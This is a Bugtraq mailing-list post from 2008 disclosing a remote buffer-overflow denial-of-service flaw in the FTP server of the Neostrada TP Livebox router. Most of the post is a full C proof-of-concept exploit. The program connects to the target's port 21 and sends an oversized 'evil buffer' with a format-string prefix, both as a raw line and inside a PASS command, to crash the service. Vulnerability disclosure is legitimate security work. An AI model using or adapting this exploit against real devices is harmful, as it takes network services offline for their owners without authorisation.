Livebox Router vulnerability to REMOTE BUFFER OVERFLOW DoS (FTPD)_

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Livebox Router vulnerability to REMOTE BUFFER OVERFLOW DoS (FTPD)_
From: 0in.email@xxxxxxxxx
Date: 1 Mar 2008 21:31:07 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Livebox Router vulnerability to REMOTE BUFFER OVERFLOW DoS

Discovered by: 0in from DaRk-CodeRs Security & Programming Group!
http://dark-coders.4rh.eu

DESCRIPTION:
Livebox (tested on polish "Neostrada TP Livebox") is vulnerability to remote 
(but from local network, because firewall working..) buffer overflow DoS attack 
to FTP service.
FULL FTP SERVER NAME:"ADI Convergence Galaxy FTP server v0.1".

POC: 

#include <sys/types.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
#include <netdb.h> 
#include <stdio.h> 
#include <unistd.h> 
#include <string.h> 

int port=21; 
struct hostent *he; 
struct sockaddr_in their_addr; 



int konekt(char *addr) 
{ 
  int sock; 

  he=gethostbyname(addr); 
  if(he==NULL) 
  { 
    printf("Unknow host!\nexiting..."); 
    return -1; 
  } 
  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) 
  { 
    perror("socket"); 
    return -2; 
  } 

  their_addr.sin_family = AF_INET;    
  their_addr.sin_port = htons(port);  
  their_addr.sin_addr = *((struct in_addr *)he->h_addr); 
  memset(&(their_addr.sin_zero), '\0', 8); 
  if (connect(sock, (struct sockaddr *)&their_addr, 
      sizeof(struct sockaddr)) == -1) 
  { 
    perror("connect"); 
    return -1; 
  } 

  return sock; 
} 

int main(int argc,char *argv[])
{
        
printf("\n+===============================Yeah======================================+");
        printf("\n+= ADI Convergence Galaxy FTP Server v1.0 (Neostrada Livebox 
DSL Router) =+");
        printf("\n+=               Remote Buffer Overflow DoS Exploit           
           =+");
        printf("\n+=                              bY                            
           =+");
        printf("\n+=        Maks M. [0in] From Dark-CodeRs Security & 
Programming Group!   =+");
        printf("\n+=                    0in(dot)email[at]gmail(dot)com          
           =+");
        printf("\n+=               Please visit: http://dark-coders.4rh.eu      
           =+");
        printf("\n+=      Greetings to: Die_Angel, Sun8hclf, M4r1usz, Aristo89, 
Djlinux    =+");
        printf("\n+=                    MaLy, Slim, elwin013, Rade0n3900, 
Wojto111,        =+");
        printf("\n+=                    Chomzee, AfroPL, Joker186               
           =+");
        
printf("\n+===============================Yeah======================================+");

        if(argc<2)
        {
                printf("\nUse %s [IP]!\n",argv[0]);
                exit(0);
        }
        printf("\nConnecting to:%s...",argv[1]);
int sock=konekt(argv[1]);
if(sock<0)
{
        printf("\neh...");
        exit(0);
}
printf("\nConnected!!\n");
char rcv[256];
recv(sock,rcv,255,0);
printf("\n%s\n",rcv);
printf("\nSending evil buffer..");
char evil[100*100]="%n\x01\x02\x03\x04";
int i;
for(i=0;i<(100*100)-100;i++)
{
        strcat(evil,"A");
}

strcat(evil,"\r\n");
send(sock,evil,strlen(evil),0);
strcpy(rcv,"");
recv(sock,rcv,255,0);
printf("\n%s\n",rcv);
char pass[100*1000]="PASS ";
strcat(pass,evil);
strcat(pass,"\n\r");
send(sock,pass,strlen(pass),0);
strcpy(rcv,"");
recv(sock,rcv,255,0);
printf("\n%s\n",rcv);
printf("\nOK!\nYou're Livebox FTP server should fu**ed out...");

exit(0);
}

EOF.

Next by Date: The Router Hacking Challenge is Over!
Next by thread: The Router Hacking Challenge is Over!
Index(es):
- Date
- Thread